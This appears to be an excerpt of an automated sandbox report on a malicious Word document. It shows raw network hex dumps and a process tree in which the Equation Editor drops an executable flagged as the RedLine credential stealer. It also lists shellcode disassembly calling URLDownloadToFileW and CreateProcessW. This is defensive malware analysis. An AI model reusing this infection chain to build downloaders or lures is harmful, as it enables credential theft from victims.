                                                2024-06-24 16:27:08 UTC1369INData Raw: 10 0c 14 25 8e 68 2f e4 47 01 5f 89 68 5e d4 15 d3 b4 97 b8 08 8d 4d 10 22 2b 1a 14 d2 f7 61 d1 4b 14 eb c8 c8 eb 9a d3 18 a0 85 6d 75 c0 81 c9 94 d2 aa 75 61 45 43 47 dc 25 53 bf 04 72 2c 88 da 34 4d 80 3a 04 24 20 1c 51 bf b8 33 26 53 50 37 20 8b f0 8a 24 38 5d 34 5f fd d3 15 e0 53 6a 11 4b 14 50 6a 30 2d e6 88 30 90 f9 e0 39 9f 8c 77 71 9f 00 68 88 57 fc 14 30 00 25 5c f7 ff eb 98 09 38 4a dc f6 07 83 57 80 7e 3a 4a 85 6d 56 3a b1 12 0e 45 a2 83 71 1a 8d 45 bc 29 f8 3a 80 36 95 34 52 d4 d8 8b 56 44 e0 47 74 34 06 48 76 10 5e 55 f8 89 b5 b8 0a 83 50 ee 98 4f bc a9 5e f8 ee ad f1 0e 83 be e0 9a 68 18 81 33 62 c5 db 1c 3d 45 80 4d cc 2b c1 8a d8 89 6b a7 69 3f fc d0 2b d0 c4 e8 e4 94 f0 a6 05 28 f8 40 e4 53 f8 e4 ba 0f 0e c3 ad e0 af 45 f8 30 e8 60 ec 99
                                                Data Ascii: %h/G_h^M"+aKmuuaECG%Sr,4M:$ Q3&SP7 $8]4_SjKPj0-09wqhW0%\8JW~:JmV:EqE):64RVDGt4Hv^UPO^h3b=EM+ki?+(@SE0`
                                                2024-06-24 16:27:08 UTC1369INData Raw: f4 a0 52 98 80 c8 82 23 75 f2 8d b7 f8 7a 7c e4 7d fc 50 97 20 24 24 12 ac 78 f4 95 ff de 46 89 0d b3 24 8b c6 ff 05 8b 0c b1 89 39 a7 12 6c 68 5d 49 b8 4f 04 24 eb 6a 03 85 38 bf fe 5e 33 ff 3b ce 7e 0d f3 24 b4 23 6e 3d f6 60 e7 74 b7 df eb ac e6 05 1e fe db eb c3 62 eb 85 46 3b f1 7c d1 eb d6 db 72 cf f1 0b 26 e4 d2 6a eb ef 5c 3b 47 3f 38 69 c3 78 73 8a 4f 74 cd e6 0a 39 31 39 62 6f c3 75 06 0d 82 f5 6d 64 d0 a6 15 52 60 06 33 db 77 bf 6f fe c2 57 cc 02 56 33 c0 89 1d 18 b8 40 88 0d bc 57 83 61 03 18 e0 cf ff a2 69 73 f0 a3 7d 97 ee 1b 36 3f c0 15 c8 d0 0b d4 cb 77 69 66 c8 16 d8 dc 0b e0 6f 78 00 be e4 8f e8 63 36 6a 7c 58 66 62 34 92 75 75 c4 ce ad 0c 5e 6c f9 0c b8 18 50 42 0b 14 22 df ec 7c 2d 67 1c 43 20 2b 24 0b 28 19 7c 2f 2e 2c 23 30 43 34 71
                                                Data Ascii: R#uz|}P $$xF$9lh]IO$j8^3;~$#n=`tbF;|r&j\;G?8ixsOt919boumdR`3woWV3@Wais}6?wifoxc6j|Xfb4uu^lPB"|-gC +$(|/.,#0C4q
                                                2024-06-24 16:27:08 UTC1369INData Raw: 43 58 6a 5c 40 13 18 0c 6b 16 64 59 fc 09 30 da 3b c3 d5 7c 1d 0f 87 63 a2 c7 b4 27 24 95 3e 15 42 6d 08 1e ee 87 41 1e d7 e2 a7 56 56 53 3f c7 6c 13 d0 2d fe a8 a8 c6 4d 28 88 96 cf 88 8e 91 f6 a5 09 e7 0b 1c a3 7c 48 f6 c1 01 4e 14 9d a6 9d a6 10 04 f4 82 d8 a8 ff 5c 4a 86 de 95 0d af 80 bb 98 ad 01 df 7a 01 c1 12 7b 60 31 0a 54 2c 74 0b 35 36 af 57 6a eb b4 14 3c 45 07 3a e6 2c 8a f4 c7 fe 4b 60 57 cb 34 18 5c e6 1e 3f ff 73 50 5e 69 ff 00 7c 7a bc eb c4 14 54 78 b0 eb bf dd 70 35 06 2e b0 c0 64 03 bb fa f3 3c cf b3 06 bc 18 36 54 72 90 cf 7b 36 cf cc ea bd 1e 56 0e 92 ae 79 ef d9 3c d4 c0 7b be 06 e4 0e fd 7b 78 cf b3 be 19 3a a4 06 c2 3e c7 1e 9e e7 3d cf 7f 2c 4a 2e 68 86 26 18 aa af ef a6 86 be d5 7d b8 77 46 97 be f8 75 16 8b 4e 6c 36 5e a9 66 c7
                                                Data Ascii: CXj\@kdY0;|c'$>BmAVVS?l-M(|HN\Jz{`1T,t56Wj<E:,K`W4\?sP^i|zTxp5.d<6Tr{6Vy<{{x:>=,J.h&}wFuNl6^f
                                                2024-06-24 16:27:08 UTC1369INData Raw: 2d 8f 15 ef 9c f5 bf 25 ff 01 f0 d4 a5 99 c1 3a ef 8d 32 2c c4 69 2b 12 64 24 2c 85 2f 03 e6 42 07 57 bc 33 10 80 db ed 34 c1 9e 6e 44 2f c8 48 74 23 a0 85 c6 70 40 0c 80 9b 5a 49 ba d2 a6 03 dd 90 34 c7 1c 10 1c 53 54 fc 34 c3 6a 30 ee 38 45 18 3d f0 01 23 01 f5 09 90 0c 76 bf dd 00 a3 ef 75 d3 27 10 a3 25 eb c6 00 24 3a cc 0d 68 9d 35 db a8 7d 67 e0 19 c5 08 eb aa bc 33 56 0a 43 27 dc 35 2d eb 99 6d 64 0e 72 8b ab 4e e1 8d 4d a4 78 a0 99 3c 6f 5a 7b 6f 1c a0 c7 45 b4 e0 68 28 b8 04 bc c0 88 5d c4 7c 87 66 7d 3a 2d 3f ec be c5 8a 45 c4 88 01 af 7d 68 0b fd 38 60 96 88 66 e0 18 6f a6 35 57 85 3d d0 35 41 1e c8 72 d4 83 0f 7d 9a d8 dc 3f 39 c2 c0 e8 40 17 03 64 51 4a 2d e9 76 b6 c3 33 36 a4 50 2c 17 83 e6 99 70 6a 6e 6c 07 33 f6 34 d0 56 9c 0c e0 05 e7 db
                                                Data Ascii: -%:2,i+d$,/BW34nD/Ht#p@ZI4ST4j08E=#vu'%$:h5}g3VC'5-mdrNMx<oZ{oEh(]|f}:-?E}h8`fo5W=5Ar}?9@dQJ-v36P,pjnl34V
                                                2024-06-24 16:27:08 UTC1369INData Raw: 7b 4c fb e6 4f 51 8b 45 08 8b 08 48 04 89 4a 04 0a 08 02 31 0a de 1e 40 0c 89 42 54 00 a3 01 15 31 31 a1 9d 98 34 28 c6 3f 8a c1 e0 02 50 24 57 31 7c 18 26 c2 62 37 1c 40 18 47 17 a3 e2 c6 75 68 9f 95 c2 27 a4 75 46 59 1c 34 56 f0 c2 e8 be a1 10 20 b9 1b 8b a8 36 79 31 de be f8 42 08 51 fd 36 61 4d 75 da d9 38 68 72 e0 53 2a 3e d9 6d 95 71 05 30 8c a8 3d 8d 4f 71 82 05 ba c7 66 14 9e 7d fc 24 c6 85 31 f1 04 05 84 01 d1 53 dd 40 05 38 86 37 86 8b 84 ab 99 2b 75 8d 5a c3 4c c7 64 38 dd 30 d2 5a 44 34 80 83 c6 04 08 9f 72 ef 05 ee 60 7c ef 68 2a 30 09 60 32 fc b8 54 ba 0f 1d 3c 38 5e 68 30 39 63 08 56 3f a6 06 16 87 44 d0 45 a5 1e e0 f5 81 ec cc 8e 71 88 64 10 ae 81 a6 26 d7 d6 04 5f 23 01 b0 7c a8 a3 72 3b 87 a2 33 cc a6 01 5c 99 94 3b 24 b8 cb db 4b 82 18
                                                Data Ascii: {LOQEHJ1@BT114(?P$W1|&b7@Guh'uFY4V 6y1BQ6aMu8hrS*>mq0=Oqf}$1S@87+uZLd80ZD4r`|h*0`2T<8^h09cV?DEqd&_#|r;3\;$K
                                                2024-06-24 16:27:08 UTC1369INData Raw: f4 d0 3f b4 2c 91 a7 5e 56 56 a8 74 c0 0a cd bb 44 c3 a4 8d 64 80 8c 01 22 06 30 e2 25 85 74 14 32 f0 03 9d dc 4f a6 33 ff a3 91 96 6f fe 35 08 5f 46 0d 70 04 08 06 10 89 74 24 14 e0 4a cf f3 16 18 20 24 95 7b 80 17 30 36 28 06 00 f9 08 df fa a9 bb e0 64 62 05 71 bc 97 b0 32 25 a8 59 7a 88 6b 76 6f 26 10 0d f6 98 3a 57 1a c0 fd 03 53 2b 48 a1 23 42 e9 24 81 6e 86 57 68 01 0c c1 40 6a 90 1d 9c fe 24 18 c9 36 04 6d 82 3e f7 c6 27 4a 65 ad f7 16 f3 79 85 2f bb 57 33 ad 54 6a 0c db f0 0e 74 12 d3 90 89 b4 40 e5 ba 35 4b b8 09 26 b4 eb ef 51 2a e8 13 83 53 cb 48 e2 4e d7 51 08 8a de 5e 31 aa 17 ab 25 56 2f d7 57 c0 45 fc 53 16 54 03 c1 50 53 a0 36 dc c1 02 5b 60 26 41 2a 68 53 53 65 81 8f 99 eb 89 06 29 5f 8b 58 42 17 7d 2e 64 a8 01 9e 83 c8 01 c0 83 4b c8 56
                                                Data Ascii: ?,^VVtDd"0%t2O3o5_Fpt$J ${06(dbq2%Yzkvo&:WS+H#B$nWh@j$6m>'Jey/W3Tjt@5K&Q*SHNQ^1%V/WESTPS6[`&A*hSSe)_XB}.dKV
                                                2024-06-24 16:27:08 UTC1369INData Raw: f9 20 08 7b ef f8 ff dc 7d ec d8 d2 df e0 f6 c4 41 02 d9 cb d8 d1 15 f6 dd 6d 9e 61 3b 8c ba 1c db dd da 37 22 de d9 57 9e 25 f8 33 74 14 9a 62 08 41 40 40 7c fc 4e 75 0b 5b de eb e9 dd d9 dd d8 4d aa df f8 4e 02 83 f9 02 72 43 6a 00 58 d6 f8 2f 4c 05 f2 49 c2 0a 8a 3c 3a 8a 5c 3a 01 69 6f 3d 3a da 84 42 e8 8b 4e 0e f4 55 e3 fd c3 d8 19 3b d1 72 de 0e 17 7a 1a 7b 23 62 85 c6 33 de 20 ef ae 95 f1 cc 6d 6a 06 d2 03 ce 49 0d 5f 8b 60 17 03 51 d3 54 2c b3 01 f0 ff bb 87 57 b2 18 d9 14 38 40 84 d2 74 3e 80 fa 7f 77 16 3b c6 81 83 56 cb 84 ae 56 b8 2c 9b f6 76 08 b5 8d 4a 3a f9 1d 76 22 0e 20 0f 76 6f 66 37 c7 24 80 6e 5a 04 76 26 40 96 45 80 39 9f 41 77 4a 68 eb c0 ba 1f ce 4f ba 02 3e 6a 90 63 13 03 b8 72 eb a8 eb 4a 3c 24 5d 02 90 72 0c 8a 0a 60 55 84 f0 20
                                                Data Ascii: {}Ama;7"W%3tbA@@|Nu[MNrCjX/LI<:\:io=:BNU;rz{#b3 mjI_`QT,W8@t>w;VV,vJ:v" vof7$nZv&@E9AwJhO>jcrJ<$]r`U


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:12:27:03
                                                Start date:24/06/2024
                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                Imagebase:0x13fd30000
                                                File size:1'423'704 bytes
                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:2
                                                Start time:12:27:04
                                                Start date:24/06/2024
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                Imagebase:0x400000
                                                File size:543'304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:12:27:08
                                                Start date:24/06/2024
                                                Path:C:\Users\user\AppData\Roaming\notorious53209.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\notorious53209.exe"
                                                Imagebase:0x880000
                                                File size:644'096 bytes
                                                MD5 hash:901A623DBCCAA22525373CD36195EE14
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                Antivirus matches:
                                                • Detection: 50%, ReversingLabs
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:12:27:09
                                                Start date:24/06/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\notorious53209.exe"
                                                Imagebase:0x3f0000
                                                File size:45'248 bytes
                                                MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:8
                                                Start time:12:27:26
                                                Start date:24/06/2024
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                Imagebase:0x400000
                                                File size:543'304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:8.3%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:57.8%
                                                  Total number of Nodes:166
                                                  Total number of Limit Nodes:3
                                                  execution_graph 1006 5ac08e ExitProcess 1028 5ac0a7 1006->1028 1008 5ac09a 1049 5ac0c3 1008->1049 1010 5ac0fc 1011 5ac14b LoadLibraryW 1010->1011 1012 5ac165 11 API calls 1011->1012 1013 5ac152 1012->1013 1015 5ac176 URLDownloadToFileW 1013->1015 1017 5ac1cc 8 API calls 1013->1017 1014 5ac0b4 1014->1010 1014->1011 1014->1013 1070 5ac136 1014->1070 1018 5ac1e5 5 API calls 1015->1018 1017->1015 1022 5ac1d5 1018->1022 1020 5ac22c CreateProcessW 1021 5ac23f ExitProcess 1020->1021 1023 5ac233 1021->1023 1022->1020 1024 5ac206 3 API calls 1022->1024 1026 5ac24f 1022->1026 1025 5ac242 ExitProcess 1023->1025 1023->1026 1027 5ac1f7 1024->1027 1027->1020 1027->1026 1029 5ac0ad 1028->1029 1030 5ac0c3 27 API calls 1029->1030 1035 5ac0b4 1029->1035 1030->1035 1031 5ac0fc 1032 5ac14b LoadLibraryW 1031->1032 1033 5ac165 11 API calls 1032->1033 1034 5ac152 1033->1034 1036 5ac176 URLDownloadToFileW 1034->1036 1038 5ac1cc 8 API calls 1034->1038 1035->1031 1035->1032 1035->1034 1040 5ac136 19 API calls 1035->1040 1039 5ac1e5 5 API calls 1036->1039 1038->1036 1044 5ac1d5 1039->1044 1040->1031 1041 5ac22c CreateProcessW 1042 5ac23f ExitProcess 1041->1042 1043 5ac233 1042->1043 1045 5ac24f 1043->1045 1047 5ac242 ExitProcess 1043->1047 1044->1041 1044->1045 1046 5ac206 3 API calls 1044->1046 1045->1008 1048 5ac1f7 1046->1048 1048->1041 1048->1045 1050 5ac0c9 1049->1050 1091 5ac0ea 1050->1091 1052 5ac0fc 1053 5ac14b LoadLibraryW 1052->1053 1054 5ac165 11 API calls 1053->1054 1055 5ac152 1054->1055 1056 5ac176 URLDownloadToFileW 1055->1056 1059 5ac1cc 8 API calls 1055->1059 1060 5ac1e5 5 API calls 1056->1060 1058 5ac0d0 1058->1052 1058->1053 1058->1055 1061 5ac136 19 API calls 1058->1061 1059->1056 1064 5ac1d5 1060->1064 1061->1052 1062 5ac22c CreateProcessW 1063 5ac23f ExitProcess 1062->1063 1065 5ac233 1063->1065 1064->1062 1066 5ac206 3 API calls 1064->1066 1069 5ac24f 1064->1069 1067 5ac242 ExitProcess 1065->1067 1065->1069 1068 5ac1f7 1066->1068 1068->1062 1068->1069 1069->1014 1071 5ac138 1070->1071 1072 5ac14b 15 API calls 1071->1072 1073 5ac13d LoadLibraryW 1072->1073 1075 5ac165 11 API calls 1073->1075 1076 5ac152 1075->1076 1077 5ac159 1076->1077 1078 5ac1c7 1076->1078 1080 5ac1cc 8 API calls 1077->1080 1079 5ac1c8 URLDownloadToFileW 1078->1079 1081 5ac1e5 5 API calls 1079->1081 1085 5ac176 1080->1085 1086 5ac1d5 1081->1086 1082 5ac22c CreateProcessW 1083 5ac23f ExitProcess 1082->1083 1084 5ac233 1083->1084 1087 5ac24f 1084->1087 1089 5ac242 ExitProcess 1084->1089 1085->1078 1085->1079 1086->1082 1086->1087 1088 5ac206 3 API calls 1086->1088 1087->1010 1090 5ac1f7 1088->1090 1090->1082 1090->1087 1092 5ac0ed 1091->1092 1093 5ac136 19 API calls 1092->1093 1094 5ac0fc LoadLibraryW 1093->1094 1096 5ac165 11 API calls 1094->1096 1097 5ac152 1096->1097 1099 5ac1cc 8 API calls 1097->1099 1103 5ac176 URLDownloadToFileW 1097->1103 1099->1103 1100 5ac1e5 5 API calls 1104 5ac1d5 1100->1104 1101 5ac22c CreateProcessW 1102 5ac23f ExitProcess 1101->1102 1105 5ac233 1102->1105 1103->1100 1104->1101 1106 5ac206 3 API calls 1104->1106 1109 5ac24f 1104->1109 1107 5ac242 ExitProcess 1105->1107 1105->1109 1108 5ac1f7 1106->1108 1108->1101 1108->1109 1109->1058 924 5ac246 GetPEB 925 5ac251 924->925 926 5ac136 927 5ac138 926->927 947 5ac14b LoadLibraryW 927->947 929 5ac13d LoadLibraryW 964 5ac165 929->964 932 5ac152 933 5ac159 932->933 934 5ac1c7 932->934 996 5ac1cc URLDownloadToFileW 933->996 935 5ac1c8 URLDownloadToFileW 934->935 978 5ac1e5 935->978 938 5ac22c CreateProcessW 994 5ac23f 938->994 940 5ac233 943 5ac24f 940->943 945 5ac242 ExitProcess 940->945 941 5ac176 941->934 941->935 942 5ac1d5 942->938 942->943 987 5ac206 942->987 948 5ac165 11 API calls 947->948 949 5ac152 948->949 950 5ac159 949->950 951 5ac1c7 949->951 953 5ac1cc 8 API calls 950->953 952 5ac1c8 URLDownloadToFileW 951->952 954 5ac1e5 5 API calls 952->954 958 5ac176 953->958 957 5ac1d5 954->957 955 5ac22c CreateProcessW 956 5ac23f ExitProcess 955->956 959 5ac233 956->959 957->955 960 5ac206 3 API calls 957->960 963 5ac24f 957->963 958->951 958->952 961 5ac242 ExitProcess 959->961 959->963 962 5ac1f7 960->962 962->955 962->963 963->929 965 5ac168 964->965 966 5ac1cc 8 API calls 965->966 967 5ac176 URLDownloadToFileW 965->967 966->967 969 5ac1e5 5 API calls 967->969 972 5ac1d5 969->972 970 5ac22c CreateProcessW 971 5ac23f ExitProcess 970->971 973 5ac233 971->973 972->970 974 5ac206 3 API calls 972->974 977 5ac24f 972->977 975 5ac242 ExitProcess 973->975 973->977 976 5ac1f7 974->976 976->970 976->977 977->932 979 5ac1e8 978->979 980 5ac206 3 API calls 979->980 981 5ac1f7 980->981 982 5ac22c CreateProcessW 981->982 984 5ac254 981->984 983 5ac23f ExitProcess 982->983 985 5ac233 983->985 984->942 985->984 986 5ac242 ExitProcess 985->986 988 5ac209 CreateProcessW 987->988 990 5ac23f ExitProcess 988->990 991 5ac233 990->991 992 5ac1f7 991->992 993 5ac242 ExitProcess 991->993 992->938 992->943 995 5ac242 ExitProcess 994->995 997 5ac1e5 5 API calls 996->997 1000 5ac1d5 996->1000 997->1000 998 5ac22c CreateProcessW 999 5ac23f ExitProcess 998->999 1001 5ac233 999->1001 1000->998 1002 5ac24f 1000->1002 1003 5ac206 3 API calls 1000->1003 1001->1002 1004 5ac242 ExitProcess 1001->1004 1002->941 1005 5ac1f7 1003->1005 1005->998 1005->1002

                                                  Callgraph

                                                  • Executed
                                                  • Not Executed
                                                  • Opacity -> Relevance
                                                  • Disassembly available
                                                  callgraph 0 Function_0059E9D9 1 Function_005B3FD9 2 Function_005B0BD9 3 Function_005AE95E 4 Function_005ABC5F 5 Function_005A5EDC 6 Function_005AA8DC 7 Function_005AD353 8 Function_005A6350 9 Function_005A20D1 10 Function_005AAF55 11 Function_005ACFCA 12 Function_0059E548 13 Function_005AC14B 15 Function_005AC1CC 13->15 35 Function_005AC26E 13->35 39 Function_005AC165 13->39 40 Function_005AC1E5 13->40 62 Function_005AC206 13->62 68 Function_005AC23F 13->68 14 Function_0059EC4D 15->35 15->40 15->62 15->68 16 Function_0059F1C1 17 Function_0059EFC1 18 Function_005AC0C3 18->15 34 Function_005AC0EA 18->34 18->35 18->39 18->40 18->62 18->68 70 Function_005AC2BF 18->70 77 Function_005AC136 18->77 19 Function_005AC340 20 Function_005A63C1 21 Function_005AC246 21->35 22 Function_005ABF47 23 Function_005ABB44 24 Function_005AA5C4 25 Function_005AC3C4 26 Function_005AE9C4 27 Function_005A5F78 28 Function_005A9F79 29 Function_005AB0FC 30 Function_005AE4FC 31 Function_005B9072 32 Function_005ABC70 33 Function_0059ECF3 34->15 34->35 34->39 34->40 34->62 34->68 34->77 36 Function_005ABDE3 37 Function_005A3B61 38 Function_005AF564 39->15 39->35 39->40 39->62 39->68 40->35 40->62 40->68 41 Function_0059E898 42 Function_0059FE9A 43 Function_005ABF1C 44 Function_0059ED1E 45 Function_005ABC1D 46 Function_0059E611 47 Function_0059E713 60 Function_0059E883 47->60 48 Function_005AEE10 49 Function_005A3596 50 Function_005AED94 51 Function_0059EF08 52 Function_005A9F89 53 Function_005AB10E 54 Function_005AC08E 54->15 54->18 54->35 54->39 54->40 54->62 54->68 54->77 90 Function_005AC0A7 54->90 55 Function_005A018C 56 Function_0059F101 57 Function_0059F301 58 Function_005A7F00 59 Function_005A4C80 61 Function_005A9F01 62->68 63 Function_005AFC84 64 Function_0059E706 65 Function_005A9F3A 66 Function_005A37BB 67 Function_005A82BB 69 Function_005AF03F 71 Function_005AAFBC 72 Function_005ABDBD 73 Function_005B24BC 74 Function_0059EFB1 75 Function_0059F1B1 76 Function_005AB733 77->13 77->15 77->35 77->39 77->40 77->62 77->68 78 Function_005A9C37 79 Function_005A9DB4 80 Function_005A2435 81 Function_005B15AB 82 Function_0059EA28 83 Function_005AC82B 84 Function_005AD8AB 85 Function_0059EA20 86 Function_005AC8A1 87 Function_0059EC25 88 Function_005A9F26 89 Function_005AC426 90->15 90->18 90->35 90->39 90->40 90->62 90->68 90->70 90->77

                                                  Executed Functions

                                                  Function 005AC0C3 Relevance: 6.2, APIs: 4, Instructions: 166processlibraryfileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 5ac0c3-5ac0d1 call 5ac2bf call 5ac0ea 5 5ac143-5ac14a 0->5 6 5ac0d3-5ac0d8 0->6 7 5ac14b-5ac155 LoadLibraryW call 5ac165 5->7 6->5 8 5ac0da 6->8 14 5ac156-5ac157 7->14 8->7 9 5ac0dc-5ac0e0 8->9 11 5ac0e2 9->11 12 5ac135-5ac142 9->12 11->14 15 5ac0e4-5ac132 call 5ac136 11->15 12->5 17 5ac159-5ac1c6 call 5ac1cc 14->17 18 5ac1c7 14->18 15->12 17->18 19 5ac1c8-5ac1d6 URLDownloadToFileW call 5ac1e5 17->19 18->19 28 5ac1d9-5ac1db 19->28 29 5ac22c-5ac236 CreateProcessW call 5ac23f 19->29 37 5ac1dd 28->37 38 5ac251 28->38 48 5ac288 29->48 49 5ac238 29->49 43 5ac24f-5ac250 37->43 44 5ac1df-5ac1f8 call 5ac206 37->44 47 5ac254-5ac265 call 5ac26e 38->47 43->38 70 5ac1fa-5ac1fb 44->70 71 5ac25f-5ac261 44->71 66 5ac267-5ac26b 47->66 55 5ac28a-5ac28e 48->55 56 5ac290-5ac294 48->56 53 5ac23a-5ac244 ExitProcess 49->53 54 5ac2a9-5ac2ab 49->54 58 5ac2bb-5ac2bc 54->58 55->56 61 5ac29c-5ac2a3 55->61 56->54 63 5ac296-5ac29a 56->63 64 5ac2a7 61->64 65 5ac2a5 61->65 63->54 63->61 68 5ac2ad-5ac2b6 64->68 65->54 74 5ac27a-5ac27d 68->74 72 5ac1fd-5ac1fe 70->72 73 5ac262-5ac265 70->73 71->73 75 5ac26f-5ac277 72->75 76 5ac200-5ac203 72->76 73->47 73->66 77 5ac2b8 74->77 78 5ac27f-5ac282 74->78 75->74 79 5ac25c-5ac25e call 5ac26e 76->79 80 5ac205-5ac22b 76->80 77->58 78->68 81 5ac284 78->81 79->71 80->29 81->48
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(005AC13D), ref: 005AC14B
                                                  • URLDownloadToFileW.URLMON(00000000,005AC176,?,00000000,00000000), ref: 005AC1CE
                                                  • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005AC22C
                                                  • ExitProcess.KERNEL32(00000000), ref: 005AC244
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_59e000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateDownloadExitFileLibraryLoad
                                                  • String ID:
                                                  • API String ID: 3376099886-0
                                                  • Opcode ID: fa2bcef1878008ff4faed326ff31fbfcea084fd9c2f02389954a5b3d092cfdbe
                                                  • Instruction ID: 0e8fbf6b3b5855f1381d461bbae6a010dda23c0e932d8567775497d46ef95711
                                                  • Opcode Fuzzy Hash: fa2bcef1878008ff4faed326ff31fbfcea084fd9c2f02389954a5b3d092cfdbe
                                                  • Instruction Fuzzy Hash: 0B41E2A950C3C51FC712A7B04E6EA9DBF657E93300B0CCACED0D50A1A3D7689605D756
                                                  Function 005AC14B Relevance: 6.1, APIs: 4, Instructions: 108libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 83 5ac14b-5ac157 LoadLibraryW call 5ac165 87 5ac159-5ac1c6 call 5ac1cc 83->87 88 5ac1c7 83->88 87->88 89 5ac1c8-5ac1d6 URLDownloadToFileW call 5ac1e5 87->89 88->89 95 5ac1d9-5ac1db 89->95 96 5ac22c-5ac236 CreateProcessW call 5ac23f 89->96 102 5ac1dd 95->102 103 5ac251 95->103 111 5ac288 96->111 112 5ac238 96->112 107 5ac24f-5ac250 102->107 108 5ac1df-5ac1f8 call 5ac206 102->108 110 5ac254-5ac265 call 5ac26e 103->110 107->103 132 5ac1fa-5ac1fb 108->132 133 5ac25f-5ac261 108->133 128 5ac267-5ac26b 110->128 117 5ac28a-5ac28e 111->117 118 5ac290-5ac294 111->118 115 5ac23a-5ac244 ExitProcess 112->115 116 5ac2a9-5ac2ab 112->116 120 5ac2bb-5ac2bc 116->120 117->118 123 5ac29c-5ac2a3 117->123 118->116 125 5ac296-5ac29a 118->125 126 5ac2a7 123->126 127 5ac2a5 123->127 125->116 125->123 130 5ac2ad-5ac2b6 126->130 127->116 136 5ac27a-5ac27d 130->136 134 5ac1fd-5ac1fe 132->134 135 5ac262-5ac265 132->135 133->135 137 5ac26f-5ac277 134->137 138 5ac200-5ac203 134->138 135->110 135->128 139 5ac2b8 136->139 140 5ac27f-5ac282 136->140 137->136 141 5ac25c-5ac25e call 5ac26e 138->141 142 5ac205-5ac22b 138->142 139->120 140->130 143 5ac284 140->143 141->133 142->96 143->111
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(005AC13D), ref: 005AC14B
                                                    • Part of subcall function 005AC165: URLDownloadToFileW.URLMON(00000000,005AC176,?,00000000,00000000), ref: 005AC1CE
                                                    • Part of subcall function 005AC165: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005AC22C
                                                    • Part of subcall function 005AC165: ExitProcess.KERNEL32(00000000), ref: 005AC244
